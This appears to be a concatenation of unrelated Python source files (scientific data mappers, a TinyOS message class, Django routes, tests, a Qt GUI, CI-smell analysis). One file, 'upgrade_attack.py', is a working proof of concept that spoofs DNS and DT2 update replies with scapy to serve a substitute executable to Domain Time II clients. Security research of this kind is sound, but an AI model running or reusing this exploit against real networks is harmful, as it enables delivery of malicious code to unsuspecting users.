# initialize
HDFMapControlCLTemplate.__init__(self, group)
# define control type
self._info["contype"] = ConType.power
# define known command list RE patterns
self._default_re_patterns = (
r"(?P<VOLT>(\bSOURCE:VOLTAGE:LEVEL\s)(?P<VAL>(\d+\.\d*|\.\d+|\d+\b)))",
)
# populate self.configs
self._build_configs()
def _build_configs(self):
"""Builds the :attr:`configs` dictionary."""
# check there are configurations to map
if len(self.subgroup_names) == 0:
why = "has no mappable configurations"
raise HDFMappingError(self._info["group path"], why=why)
# build configuration dictionaries
# - assume every sub-group represents a unique configuration
# to the control device
# - the name of each sub-group is used as the configuration
# name
# - assume all configurations are active (i.e. used)
#
for name in self.subgroup_names:
# get configuration group
cong = self.group[name]
# get dataset
try:
dset = self.group[self.construct_dataset_name()]
except KeyError:
                why = (
                    f"Dataset '{self.construct_dataset_name()}' not found in "
                    f"configuration group '{name}'"
                )
raise HDFMappingError(self._info["group path"], why=why)
# initialize _configs
self._configs[name] = {}
# ---- define general info values ----
pairs = [
("IP address", "IP address"),
("power supply device", "Model Number"),
("initial state", "Initialization commands"),
("command list", "N5700 power supply command list"),
]
for pair in pairs:
try:
# get attribute value
val = cong.attrs[pair[1]]
# condition value
if pair[0] == "command list":
# - val gets returned as a np.bytes_ string
# - split line returns
# - remove trailing/leading whitespace
#
val = _bytes_to_str(val).splitlines()
val = tuple([cls.strip() for cls in val])
else:
# pair[0] in ('IP address',
# 'power supply device',
# 'initial state'):
# - val is a np.bytes_ string
#
val = _bytes_to_str(val)
# assign val to _configs
self._configs[name][pair[0]] = val
except KeyError:
self._configs[name][pair[0]] = None
warn_str = (
f"Attribute '{pair[1]}' not found in control device "
f"'{self.device_name}' configuration group '{name}'"
)
if pair[0] != "command list":
warn_str += ", continuing with mapping"
warn(warn_str)
else:
why = (
f"Attribute '{pair[1]}' not found for configuration "
f"group '{name}'"
)
raise HDFMappingError(self._info["group path"], why=why)
# ---- define 'dset paths' ----
self._configs[name]["dset paths"] = (dset.name,)
# ---- define 'shotnum' ----
# initialize
self._configs[name]["shotnum"] = {
"dset paths": self._configs[name]["dset paths"],
"dset field": ("Shot number",),
"shape": dset.dtype["Shot number"].shape,
"dtype": np.int32,
}
# ---- define 'state values' ----
# catch and suppress warnings only for initialization
with warnings.catch_warnings():
warnings.simplefilter("ignore")
try:
sv_dict = self._construct_state_values_dict(
name, self._default_re_patterns
)
except KeyError:
sv_dict = {}
# initialize
self._configs[name]["state values"] = (
sv_dict if bool(sv_dict) else self._default_state_values_dict(name)
)
def _default_state_values_dict(self, config_name: str) -> dict:
# define default dict
default_dict = {
"command": {
"dset paths": self._configs[config_name]["dset paths"],
"dset field": ("Command index",),
"re pattern": None,
"command list": self._configs[config_name]["command list"],
"cl str": self._configs[config_name]["command list"],
"shape": (),
}
}
default_dict["command"]["dtype"] = np.array(
default_dict["command"]["command list"]
).dtype
# return
return default_dict
def construct_dataset_name(self, *args) -> str:
"""
Constructs name of dataset containing control state value data.
"""
return "Run time list"
|
A = AdemAlgebra(2)
A.compute_basis(20)
M = FDModule(A, "M", 0)
M.add_generator(0, "x0")
M.add_generator(2, "x2")
M.parse_action("Sq2 x0 = x2", None)
M.freeze()
r = ext.resolution.Resolver("Ceta", module=M)
Ceta = ResolverChannel(r, REPL)
await Ceta.setup_a()
Ceta.chart.sseq.initial_x_range = [0, 40]
Ceta.chart.sseq.initial_y_range = [0, 20]
Ceta.chart.x_range = [0, 80]
Ceta.chart.y_range = [0, 40]
Ceta.resolver.resolve(50)
|
from data_structures.reverse_linked_list import *
# def test_import():
# assert reverse_list
|
#
# This class is automatically generated by mig. DO NOT EDIT THIS FILE.
# This class implements a Python interface to the 'Msg'
# message type.
#
import tinyos.message.Message
# The default size of this message type in bytes.
DEFAULT_MESSAGE_SIZE = 6
# The Active Message type associated with this message.
AM_TYPE = 202
class Msg(tinyos.message.Message.Message):
# Create a new Msg of size 6.
def __init__(self, data="", addr=None, gid=None, base_offset=0, data_length=6):
tinyos.message.Message.Message.__init__(self, data, addr, gid, base_offset, data_length)
self.amTypeSet(AM_TYPE)
# Get AM_TYPE
def get_amType(cls):
return AM_TYPE
get_amType = classmethod(get_amType)
#
# Return a String representation of this message. Includes the
# message type name and the non-indexed field values.
#
def __str__(self):
s = "Message <Msg> \n"
try:
s += " [node=0x%x]\n" % (self.get_node())
except:
pass
try:
s += " [var_id=0x%x]\n" % (self.get_var_id())
except:
pass
try:
s += " [var_type=0x%x]\n" % (self.get_var_type())
except:
pass
try:
s += " [ve_start_byte=0x%x]\n" % (self.get_ve_start_byte())
except:
pass
return s
# Message-type-specific access methods appear below.
#
# Accessor methods for field: node
# Field type: int
# Offset (bits): 0
# Size (bits): 16
#
#
# Return whether the field 'node' is signed (False).
#
def isSigned_node(self):
return False
#
# Return whether the field 'node' is an array (False).
#
def isArray_node(self):
return False
#
# Return the offset (in bytes) of the field 'node'
#
def offset_node(self):
return (0 / 8)
#
# Return the offset (in bits) of the field 'node'
#
def offsetBits_node(self):
return 0
#
# Return the value (as a int) of the field 'node'
#
def get_node(self):
return self.getUIntElement(self.offsetBits_node(), 16, 1)
#
# Set the value of the field 'node'
#
def set_node(self, value):
self.setUIntElement(self.offsetBits_node(), 16, value, 1)
#
# Return the size, in bytes, of the field 'node'
#
def size_node(self):
return (16 / 8)
#
# Return the size, in bits, of the field 'node'
#
def sizeBits_node(self):
return 16
#
# Accessor methods for field: var_id
# Field type: int
# Offset (bits): 16
# Size (bits): 16
#
#
# Return whether the field 'var_id' is signed (False).
#
def isSigned_var_id(self):
return False
#
# Return whether the field 'var_id' is an array (False).
#
def isArray_var_id(self):
return False
#
# Return the offset (in bytes) of the field 'var_id'
#
def offset_var_id(self):
return (16 / 8)
#
# Return the offset (in bits) of the field 'var_id'
#
def offsetBits_var_id(self):
return 16
#
# Return the value (as a int) of the field 'var_id'
#
def get_var_id(self):
return self.getUIntElement(self.offsetBits_var_id(), 16, 1)
#
# Set the value of the field 'var_id'
#
def set_var_id(self, value):
self.setUIntElement(self.offsetBits_var_id(), 16, value, 1)
#
# Return the size, in bytes, of the field 'var_id'
#
def size_var_id(self):
return (16 / 8)
#
# Return the size, in bits, of the field 'var_id'
#
def sizeBits_var_id(self):
return 16
#
# Accessor methods for field: var_type
# Field type: short
# Offset (bits): 32
# Size (bits): 8
#
#
# Return whether the field 'var_type' is signed (False).
#
def isSigned_var_type(self):
return False
#
# Return whether the field 'var_type' is an array (False).
#
def isArray_var_type(self):
return False
#
# Return the offset (in bytes) of the field 'var_type'
#
def offset_var_type(self):
return (32 / 8)
#
# Return the offset (in bits) of the field 'var_type'
#
def offsetBits_var_type(self):
return 32
#
# Return the value (as a short) of the field 'var_type'
#
def get_var_type(self):
return self.getUIntElement(self.offsetBits_var_type(), 8, 1)
#
# Set the value of the field 'var_type'
#
def set_var_type(self, value):
self.setUIntElement(self.offsetBits_var_type(), 8, value, 1)
#
# Return the size, in bytes, of the field 'var_type'
#
def size_var_type(self):
return (8 / 8)
#
# Return the size, in bits, of the field 'var_type'
#
def sizeBits_var_type(self):
return 8
#
# Accessor methods for field: ve_start_byte
# Field type: byte
# Offset (bits): 40
# Size (bits): 8
#
#
# Return whether the field 've_start_byte' is signed (False).
#
def isSigned_ve_start_byte(self):
return False
#
# Return whether the field 've_start_byte' is an array (False).
#
def isArray_ve_start_byte(self):
return False
#
# Return the offset (in bytes) of the field 've_start_byte'
#
def offset_ve_start_byte(self):
return (40 / 8)
#
# Return the offset (in bits) of the field 've_start_byte'
#
def offsetBits_ve_start_byte(self):
return 40
#
# Return the value (as a byte) of the field 've_start_byte'
#
def get_ve_start_byte(self):
return self.getSIntElement(self.offsetBits_ve_start_byte(), 8, 1)
#
# Set the value of the field 've_start_byte'
#
def set_ve_start_byte(self, value):
self.setSIntElement(self.offsetBits_ve_start_byte(), 8, value, 1)
#
# Return the size, in bytes, of the field 've_start_byte'
#
def size_ve_start_byte(self):
return (8 / 8)
#
# Return the size, in bits, of the field 've_start_byte'
#
def sizeBits_ve_start_byte(self):
return 8
|
from .facade import Client
|
#!/usr/bin/env python
from multiprocessing import Process
from time import sleep
import argparse
import http.server
import re
import socketserver
import socket
from scapy.all import *
def build_dns_response(query, name):
ip = query[IP]
udp = query[UDP]
dns = query[DNS]
dns_answer = DNSRR(rrname=name, type='A', rclass='IN', ttl=5, rdata=server_ip)
response = IP(src=ip.dst, dst=ip.src)
response /= UDP(sport=udp.dport, dport=udp.sport)
response /= DNS(id=dns.id, qr=1, aa=0, qdcount=1, ancount=1, qd=dns.qd, an=dns_answer)
return response
def parse_dns_query(pkt):
if DNSRR in pkt:
name = pkt[DNSRR].rrname.decode('UTF-8', errors='backslashreplace')
print(f'DNS Response for "{name}" from {pkt[IP].src}')
elif DNSQR in pkt:
name = pkt[DNSQR].qname.decode('UTF-8', errors='backslashreplace')
print(f'DNS Query for "{name}" from {pkt[IP].src}')
for update_domain in update_domains:
if name.startswith(update_domain):
dns_response = build_dns_response(pkt, name)
send(dns_response, iface=sniff_iface)
print(f'[+] Target DNS Query responded to with {server_ip}')
def parse_dt2_pkt(pkt):
ip = pkt[IP]
udp = pkt[UDP]
print(f'DT2 from {ip.src}:{udp.sport} to {ip.dst}:{udp.dport}')
if ip.dst == server_ip:
update_regex = b'[1-5]\\.[0-9]\\..\\.[0-9]*\x00'
if re.search(update_regex, udp.payload.load):
dt2 = udp.payload
update_response = IP(src=ip.dst, dst=ip.src)
update_response /= UDP(sport=udp.dport, dport=udp.sport)
update_response /= update_url.encode('utf-8') + b"\x00"
send(update_response, iface=sniff_iface)
print(f'[+] Responded to target DT2 Update request: {dt2.load}')
def udp_callback(pkt):
if IP not in pkt or UDP not in pkt:
return
udp = pkt[UDP]
try:
if udp.dport == 53 or udp.sport == 53:
parse_dns_query(pkt)
if udp.dport == 9909 or udp.sport == 9909:
parse_dt2_pkt(pkt)
except Exception as e:
print(f'[!] Packet caused exception: {str(e)}')
print(f' {pkt.summary()}')
class CustomHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
# strip extra params for pattern matching
if '?' in self.path:
path = self.path[:self.path.find('?')]
else:
path = self.path
if path.endswith('.exe'):
# serve a demonstration payload
self.path = 'files/calc.exe'
return http.server.SimpleHTTPRequestHandler.do_GET(self)
elif path.endswith('.asp'):
# serve our copy of their update page
#self.path = 'files/registered.asp.html'
self.path = 'files/evaluation.asp.html'
return http.server.SimpleHTTPRequestHandler.do_GET(self)
else:
# Redirect to non-www greyware domain so they serve the content
self.send_response(302)
self.send_header('Location', f'http://greyware.com/{self.path}')
self.end_headers()
return
def serve_http_thread(server_ip, http_port):
http_address = (server_ip, http_port)
custom_http_server = socketserver.TCPServer(http_address, CustomHttpRequestHandler)
print(f'Serving HTTP at {server_ip} on port {http_port}...')
try:
while True:
custom_http_server.handle_request()
except KeyboardInterrupt:
pass
print('HTTP server stopped.')
def recv_udp(server_ip):
"""Keep 9909:UDP open but do nothing; response happens in sniffer."""
udp_address = (server_ip, 9909)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(udp_address)
print(f'Ready for DT2 traffic at {server_ip}')
try:
while True:
_ = s.recv(0x1000)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser('upgrade_attack.py', description='Proof of concept MotS on DT2 upgrade')
parser.add_argument('interface', help='Interface to sniff/send on')
parser.add_argument('ip_address', help='IP to serve fake update on')
parser.add_argument('-i', '--http_impersonation', help='Run the HTTP impersonation PoC',
default=False, action='store_true')
parser.add_argument('-p', '--port', help='Port to serve fake update on',
type=int, default=80)
args = parser.parse_args()
sniff_iface = args.interface
server_ip = args.ip_address
http_port = args.port
if http_port == 80:
port_string = ''
else:
port_string = f':{http_port}'
# Legitimate update link example:
# 'https://www.greyware.com/software/domaintime/update/evaluation.asp'
if args.http_impersonation:
# This points to their URL (HTTP), which assumes we can win DNS and HTTP races
update_url = 'http://www.greyware.com/software/domaintime/update/evaluation.asp'
#update_url = 'http://www.greyware.com/software/domaintime/update/registered.asp'
else:
# This points to a URL on our server, not theirs
update_url = f'http://{server_ip}{port_string}/software/domaintime/update/evaluation.asp'
#update_url = f'http://{server_ip}{port_string}/software/domaintime/update/registered.asp'
# The typical update domains (DT2 update domain and web domain)
update_domains = ['update.greyware.com', 'www.greyware.com']
http_child = Process(target=serve_http_thread, args=(server_ip, http_port))
http_child.start()
# Let the HTTP server start up first
sleep(1)
if not http_child.is_alive():
print('Error: HTTP server failed to start correctly, quitting...')
exit(-1)
# listen on 9909:UDP so we don't respond that the port is closed
udp_child = Process(target=recv_udp, args=(server_ip,))
udp_child.start()
sleep(0.1)
if not udp_child.is_alive():
print('Warning: failed to listen on port 9909:UDP; may not respond correctly')
# Removes extra scapy logging on send()
conf.verb = False
print(f'Sniffing for upgrade traffic on interface {sniff_iface}, Press CTRL+C to stop...')
try:
sniff(iface=sniff_iface, prn=udp_callback, filter="udp", store=False)
except Scapy_Exception as e:
print(f'Scapy Exception occurred: {str(e)}')
print(f'Error: Sniffing failed, check you\'re on the right interface and run with sudo.')
http_child.terminate()
http_child.join()
udp_child.terminate()
udp_child.join()
print('Done.')
|
from django.urls import path
from .views import create_product_view, product_detail_view, edit_product_view
urlpatterns = [
path('add_product', create_product_view, name='add_product'),
path('product/<str:pk>/', product_detail_view, name='product_detail'),
path('product/<str:pk>/edit', edit_product_view, name='edit_product'),
]
|
import requests
from joblib import Parallel, delayed
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
from .config import DATASET, SRC_FILES, n_jobs
from .data_reader import ManySStuBs4J
def download_file(session, url, save_path):
if not save_path.exists() or save_path.stat().st_size == 0:
try:
with session.get(url) as r:
r.raise_for_status()
save_path.parent.mkdir(parents=True, exist_ok=True)
with open(save_path, 'wb') as file:
file.write(r.content)
except Exception as e:
with open('error_log.txt', 'a') as logf:
logf.write(f'{e}, {url}\n')
def main():
manysstub = ManySStuBs4J(DATASET)
download_params = []
for bug in manysstub.bugs:
# Downloading file with parent hash
download_params.append(
(bug.file_url_parent_hash,
SRC_FILES / bug.buggy_file_dir / bug.file_name)
)
# Downloading file with fix hash
download_params.append(
(bug.file_url_fix_hash,
SRC_FILES / bug.fixed_file_dir / bug.file_name)
)
with requests.Session() as session:
retries = Retry(total=5,
backoff_factor=0.1,
status_forcelist=[500, 502, 503, 504])
session.mount('https://', HTTPAdapter(max_retries=retries))
Parallel(n_jobs=n_jobs)(delayed(download_file)(session, url, save_path)
for url, save_path in download_params)
if __name__ == '__main__':
main()
|
# This file is part of the pyMOR project (https://www.pymor.org).
# Copyright 2013-2021 pyMOR developers and contributors. All rights reserved.
# License: BSD 2-Clause License (https://opensource.org/licenses/BSD-2-Clause)
from pymortests.base import runmodule
from pymortests.pickling import assert_picklable, assert_picklable_without_dumps_function
def test_pickle(analytical_problem):
assert_picklable(analytical_problem)
def test_pickle_without_dumps_function(picklable_analytical_problem):
assert_picklable_without_dumps_function(picklable_analytical_problem)
if __name__ == "__main__":
runmodule(filename=__file__)
|
# coding: utf-8
# In[1]:
from song import measure_xdrift
# In[2]:
dp = '/hydrogen/song/star_spec/20161206/night/raw/'
# In[3]:
t = measure_xdrift.scan_files(dp)
# In[4]:
t2, fig = measure_xdrift.check_xdrift(t)
# In[5]:
fig
# In[6]:
fig.savefig('/hydrogen/song/figs/Xdrift_20161206.svg')
# In[7]:
t.write('/hydrogen/song/figs/file_catalog_20161206.fits')
|
from __future__ import division, print_function
import time
from tfmini_library import TFmini
# create the sensor and give it a port and (optional) operating mode
tf = TFmini('/dev/ttyS0', mode=TFmini.STD_MODE)
#f=open("lidarDump.txt",a)
print('init done')
try:
print('='*25)
while True:
d = tf.read()
if d:
#f.write('Distance: {:5}, Strength: {:5}'.format(d[0],d[1]))
print('Distance: {:5}, Strength: {:5}'.format(d[0], d[1]))
else:
print('No valid response')
time.sleep(0.1)
except KeyboardInterrupt:
tf.close()
    #f.close()
print('bye!!')
|
# vim: sw=4:ts=4:et
#
# ACE proxy settings
import urllib.parse
import saq
def proxies():
"""Returns the current proxy settings pulled from the configuration.
Returns a dict in the following format. ::
{
'http': 'url',
'https': 'url'
}
"""
# set up the PROXY global dict (to be used with the requests library)
result = {}
for proxy_key in [ 'http', 'https' ]:
if saq.CONFIG['proxy']['host'] and saq.CONFIG['proxy']['port'] and saq.CONFIG['proxy']['transport']:
if saq.CONFIG['proxy']['user'] and saq.CONFIG['proxy']['password']:
result[proxy_key] = '{}://{}:{}@{}:{}'.format(
saq.CONFIG['proxy']['transport'],
urllib.parse.quote_plus(saq.CONFIG['proxy']['user']),
urllib.parse.quote_plus(saq.CONFIG['proxy']['password']),
saq.CONFIG['proxy']['host'],
saq.CONFIG['proxy']['port'])
else:
result[proxy_key] = '{}://{}:{}'.format(saq.CONFIG['proxy']['transport'],
saq.CONFIG['proxy']['host'],
saq.CONFIG['proxy']['port'])
return result
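if __name__ == '__main__':
    # Quick manual check (illustrative): print the proxy map built from the current
    # configuration; the returned dict plugs directly into the requests library,
    # e.g. requests.get(url, proxies=proxies()). Assumes saq.CONFIG has been loaded.
    import pprint
    pprint.pprint(proxies())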
|
from .alphabet import Alphabet
from .beam_search import BeamSearcher
from .language_model import LanguageModel
|
from urllib.parse import urlencode
from seafileapi.utils import utf8lize
from seafileapi.files import SeafDir, SeafFile
from seafileapi.utils import raise_does_not_exist
class Repo(object):
"""
A seafile library
"""
def __init__(self, client, repo_id, repo_name,
encrypted, owner, perm):
self.client = client
self.id = repo_id
self.name = repo_name
self.encrypted = encrypted
self.owner = owner
self.perm = perm
@classmethod
def from_json(cls, client, repo_json):
repo_json = utf8lize(repo_json)
repo_id = repo_json['id']
repo_name = repo_json['name']
encrypted = repo_json['encrypted']
perm = repo_json['permission']
owner = repo_json['owner']
return cls(client, repo_id, repo_name, encrypted, owner, perm)
def is_readonly(self):
return 'w' not in self.perm
@raise_does_not_exist('The requested file does not exist')
def get_file(self, path):
"""Get the file object located in `path` in this repo.
Return a :class:`SeafFile` object
"""
assert path.startswith('/')
url = '/api2/repos/%s/file/detail/' % self.id
query = '?' + urlencode(dict(p=path))
file_json = self.client.get(url + query).json()
return SeafFile(self, path, file_json['id'], file_json['size'])
@raise_does_not_exist('The requested dir does not exist')
def get_dir(self, path):
"""Get the dir object located in `path` in this repo.
Return a :class:`SeafDir` object
"""
assert path.startswith('/')
url = '/api2/repos/%s/dir/' % self.id
query = '?' + urlencode(dict(p=path))
resp = self.client.get(url + query)
dir_id = resp.headers['oid']
dir_json = resp.json()
dir = SeafDir(self, path, dir_id)
dir.load_entries(dir_json)
return dir
def delete(self):
"""Remove this repo. Only the repo owner can do this"""
self.client.delete('/api2/repos/' + self.id)
def list_history(self):
"""List the history of this repo
Returns a list of :class:`RepoRevision` object.
"""
pass
## Operations only the repo owner can do:
def update(self, name=None):
"""Update the name of this repo. Only the repo owner can do
this.
"""
pass
def get_settings(self):
"""Get the settings of this repo. Returns a dict containing the following
keys:
`history_limit`: How many days of repo history to keep.
"""
pass
def restore(self, commit_id):
pass
class RepoRevision(object):
def __init__(self, client, repo, commit_id):
self.client = client
self.repo = repo
self.commit_id = commit_id
def restore(self):
"""Restore the repo to this revision"""
self.repo.revert(self.commit_id)
|
import addict
from act.scio.plugins import threatactor_pattern
import os
import pytest
@pytest.mark.asyncio
async def test_threatactor_pattern() -> None:
""" test for plugins """
nlpdata = addict.Dict()
nlpdata.content = '''Lorem Ipsum Dirty Panda, APT1 APT-2, Apt 35, APT_46'''
plugin = threatactor_pattern.Plugin()
plugin.configdir = os.path.join(os.path.dirname(__file__), "../act/scio/etc/plugins")
res = await plugin.analyze(nlpdata)
assert 'Dirty Panda' in res.result.ThreatActors
assert 'APT 1' in res.result.ThreatActors
assert 'APT 2' in res.result.ThreatActors
assert 'APT 35' in res.result.ThreatActors
assert 'APT 46' in res.result.ThreatActors
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.testsdk import ScenarioTest, ResourceGroupPreparer
class DocumentDBTests(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_cosmosdb_account')
def test_create_database_account(self, resource_group):
self.kwargs.update({
'acc': self.create_random_name(prefix='cli', length=40)
})
self.cmd('az cosmosdb create -n {acc} -g {rg} --enable-automatic-failover --default-consistency-level ConsistentPrefix')
self.cmd('az cosmosdb show -n {acc} -g {rg}', checks=[
self.check('enableAutomaticFailover', True),
self.check('consistencyPolicy.defaultConsistencyLevel', 'ConsistentPrefix'),
])
self.cmd('az cosmosdb update -n {acc} -g {rg} --enable-automatic-failover false --default-consistency-level Session')
self.cmd('az cosmosdb show -n {acc} -g {rg}', checks=[
self.check('enableAutomaticFailover', False),
self.check('consistencyPolicy.defaultConsistencyLevel', 'Session')
])
|
import subprocess
import time
import argparse
proc = None
moving = True
def arg_conv(value):
    if value.lower() in ('yes', 'true', 't', 'y', '1'):
        return True
    elif value.lower() in ('no', 'false', 'f', 'n', '0'):
        return False
    else:
        raise argparse.ArgumentTypeError('Please enter a boolean value like true or false!')
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--picamera", type=arg_conv, default=False,
help="whether or not the Raspberry Pi camera should be used")
args = vars(ap.parse_args())
isRaspberryPi = 1 if args['picamera'] else 0
while moving:
if moving and proc is None:
proc = subprocess.Popen(['python3', 'detection.py', '-p', str(isRaspberryPi)])
time.sleep(20) # remove this line -- used for debugging
moving = False
    elif not moving and proc is not None:
proc.terminate()
proc = None
moving = False
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Main file of Altai. Execute it to use the application. """
# System imports
import sys
from os.path import expanduser
import PySide2.QtGui as QtGui
import PySide2.QtCore as QtCore
import PySide2.QtWidgets as QtWidgets
# Altai imports
from . import config
from .vented_box_frame import VentedBoxFrame
from .vent_dimensions_frame import VentDimensionsFrame
from .driver_db_frame import DriverDatabaseFrame
class Gui(QtWidgets.QMainWindow):
""" Gui class for the main window. """
def __init__(self):
QtWidgets.QMainWindow.__init__(self)
self.setWindowTitle("Altai")
self.create_menu()
self.tab_bar = QtWidgets.QTabBar()
self.tab_bar.addTab("Vented Box Response")
self.tab_bar.addTab("Vent Dimensions")
self.tab_bar.addTab("Driver Database")
self.tab_bar.currentChanged.connect(self.change_main_tab)
vented_box_frame = VentedBoxFrame()
vent_dimensions_frame = VentDimensionsFrame()
driver_database_frame = DriverDatabaseFrame()
driver_database_frame.new_manufacturer_added.connect(
vented_box_frame.driver_selection.update_drivers)
driver_database_frame.new_manufacturer_added.connect(
vent_dimensions_frame.driver_selection.update_drivers)
self.main_frames = [vented_box_frame, vent_dimensions_frame,
driver_database_frame]
vbox = QtWidgets.QVBoxLayout()
vbox.addWidget(self.tab_bar)
for i, frame in enumerate(self.main_frames):
vbox.addWidget(frame)
if i > 0:
frame.hide()
self.main_frame = QtWidgets.QWidget()
self.main_frame.setLayout(vbox)
self.setCentralWidget(self.main_frame)
def change_main_tab(self, tab_index):
""" Switch between main tab views. """
for i, frame in enumerate(self.main_frames):
if tab_index == i:
frame.show()
else:
frame.hide()
def create_menu(self):
""" Create main menu """
menu_file = self.menuBar().addMenu("&File")
menu_help = self.menuBar().addMenu("&Help")
# Save Figure
act_save = QtWidgets.QAction(self)
act_save.setText("Save Response as...")
act_save.setIcon(QtGui.QIcon.fromTheme('document-save-as'))
menu_file.addAction(act_save)
act_save.triggered.connect(self.save_figure)
# Exit button
act_exit = QtWidgets.QAction(self)
act_exit.setText("Exit")
act_exit.setIcon(QtGui.QIcon.fromTheme('application-exit'))
menu_file.addAction(act_exit)
act_exit.triggered.connect(self.close)
# About window
act_about = QtWidgets.QAction(self)
act_about.setText("About")
act_about.setIcon(QtGui.QIcon.fromTheme('help-about'))
menu_help.addAction(act_about)
act_about.triggered.connect(self.create_about_window)
def save_figure(self):
""" Save figure as file; all filetypes that are supported by matplotlib"""
home = expanduser("~")
fname, _ = QtWidgets.QFileDialog.getSaveFileName(
self, "Save Response as", home,
"PDF, PNG and SVG (*.pdf *.png *.svg)")
        if fname:
            self.main_frames[0].fig.savefig(fname)
def create_about_window(self):
""" Creates the about window for Altai. """
about = ("Altai is a cross-platform application for simulating audio "
"systems. With it, you can design speakers, find the optimum "
"driver, predict the frequency response, etc. It is still in "
"a very early stage of development. You can follow its "
"progress on github: <a href='http://github.com/Psirus/altai'>"
"Altai on GitHub</a>. Please report any issues and feature "
"ideas you may have.")
reply = QtWidgets.QMessageBox(self)
reply.setWindowTitle("About Altai")
reply.setTextFormat(QtCore.Qt.TextFormat.RichText)
reply.setText(about)
reply.exec_()
def main():
""" Main function; acts as entry point for Altai. """
app = QtWidgets.QApplication(sys.argv)
gui = Gui()
gui.resize(800, 600)
gui.show()
sys.exit(app.exec_())
|
import numpy as np
import pandas
import random
import re
import sys
from scipy.stats import pearsonr, spearmanr
# auxiliary functions
def buildSeriesByCategory(df, categories):
res = []
for cat in categories:
occ = df.loc[df["category"] == cat].shape[0]
res.append(occ)
res_series = pandas.Series(res, index=categories)
return res_series
def fillList(series):
list = []
for label, value in series.items():
if label != "reacted":
num = value
while num > 0:
list.append(label)
num = num - 1
return pandas.Series(list)
def printStatsByCategory(df, categories):
for cat in categories:
occ = df.loc[df["category"] == cat].shape[0]
print(cat + ": " + str(occ))
def buildOverallResultSeries(resulting_series):
    res_list = []
    for label, serie in resulting_series.items():
        total = 0
        for value in serie:
            total += value
        res_list.append(total)
    return res_list
def fillTwoLists(typ, cat, labels_string, cat_list, label_list):
labels = labels_string.split(",")
for label in labels:
if label != 'nan':
cat_list.append(cat)
label_list.append(typ + ":" + label.strip())
def printOccurrences(antipatterns, tot_smells, tot_ana_projects, tot_ana_owners):
num_smells = antipatterns['ID'].shape[0]
percentage_num_smells = round(num_smells / tot_smells * 100, 1)
print("#smells: " + str(num_smells) + "(" + str(percentage_num_smells) + "%)")
num_smelly_projects = antipatterns['Project'].unique().shape[0]
percentage_num_smelly_projects = round(num_smelly_projects / tot_ana_projects * 100, 1)
print("#smelly-projects: " + str(num_smelly_projects) + "(" + str(percentage_num_smelly_projects) + "%)")
num_smelly_owners = antipatterns['Owner'].unique().shape[0]
percentage_num_smelly_owners = round(num_smelly_owners / tot_ana_owners * 100, 1)
print("#smelly-owners: " + str(num_smelly_owners) + "(" + str(percentage_num_smelly_owners) + "%)")
def printOccurrencesPerCluster(apdf, tot_smells, tot_ana_projects, tot_ana_owners, tot_ana_projects_versioning,
tot_ana_owners_versioning):
print("\n-> Versioning")
versioning = apdf.loc[apdf["Category"] == "Versioning"]
printOccurrences(versioning, tot_smells, tot_ana_projects_versioning, tot_ana_owners_versioning)
print("\n-> Job-Allow-Failure")
allow_failure = apdf.loc[apdf["Category"] == "Job-Allow-Failure"]
printOccurrences(allow_failure, tot_smells, tot_ana_projects, tot_ana_owners)
print("\n-> Job-Retry")
retry = apdf.loc[apdf["Category"] == "Job-Retry"]
printOccurrences(retry, tot_smells, tot_ana_projects, tot_ana_owners)
print("\n-> Manual-Job")
manual = apdf.loc[apdf["Category"] == "Manual-Job"]
printOccurrences(manual, tot_smells, tot_ana_projects, tot_ana_owners)
def printOccurrences2(df, tot):
num_smells = df['ID'].shape[0]
percentage_num_smells = round(num_smells / tot * 100, 1)
print("#smells: " + str(num_smells) + "(" + str(percentage_num_smells) + "%)")
def printOccurrencesPerCluster2(apdf, tot_versioning, tot_allow, tot_retry, tot_manual):
print("-> Versioning")
versioning = apdf.loc[apdf["Category"] == "Versioning"]
printOccurrences2(versioning, tot_versioning)
print("-> Job-Allow-Failure")
allow_failure = apdf.loc[apdf["Category"] == "Job-Allow-Failure"]
printOccurrences2(allow_failure, tot_allow)
print("-> Job-Retry")
retry = apdf.loc[apdf["Category"] == "Job-Retry"]
printOccurrences2(retry, tot_retry)
print("-> Manual-Job")
manual = apdf.loc[apdf["Category"] == "Manual-Job"]
printOccurrences2(manual, tot_manual)
# RQ3 data analysis
def rqthree_results(input_file, dataset):
datasetf = pandas.read_csv(dataset)
datasetf = datasetf.loc[datasetf["hasYaml"]] # remove projects without yaml
print("Analyzable projects: " + str(datasetf.shape[0]))
print("\n### Describe dataset ###")
summary = datasetf['yml_size'].describe()
tot_projects = datasetf["project"].unique().shape[0]
tot_owners = datasetf["owner"].unique().shape[0]
print("Analyzable repositories: " + str(tot_projects))
# for versioning different candidates
versioning_candidates = datasetf.loc[(datasetf["language"] == "Python") | (datasetf["hasPoms"])]
tot_projects_versioning = versioning_candidates["project"].unique().shape[0]
tot_owners_versioning = versioning_candidates["owner"].unique().shape[0]
print("Analyzable repositories (Versioning): " + str(tot_projects_versioning))
print("Analyzable owners: " + str(tot_owners))
print("Analyzable owners (Versioning): " + str(tot_owners_versioning))
yml_first_quartile = summary["25%"]
print("YML-size (25%): " + str(yml_first_quartile))
yml_third_quartile = summary["75%"]
print("YML-size (75%): " + str(yml_third_quartile))
# Merge antipatterns with dataset
antipatterns = pandas.read_csv(input_file)
apdf = pandas.merge(antipatterns, datasetf, left_on='Repository Name', right_on='project', how='left')
# exclude additional python projects without yaml
apdf = apdf.loc[pandas.notna(apdf["project"])]
print("\n### Full-analysis of smells ###")
print("-> Overall")
tot_smells = apdf['ID'].shape[0]
tot_smelly_projects = apdf['Project'].unique().shape[0]
tot_smelly_owners = apdf['owner'].unique().shape[0]
print("#smells: " + str(tot_smells))
print("#smelly-projects: " + str(tot_smelly_projects))
print("#smelly-owners: " + str(tot_smelly_owners))
printOccurrencesPerCluster(apdf, tot_smells, tot_projects, tot_owners, tot_projects_versioning,
tot_owners_versioning)
print("\n### YAML-size-based clustering analysis ###")
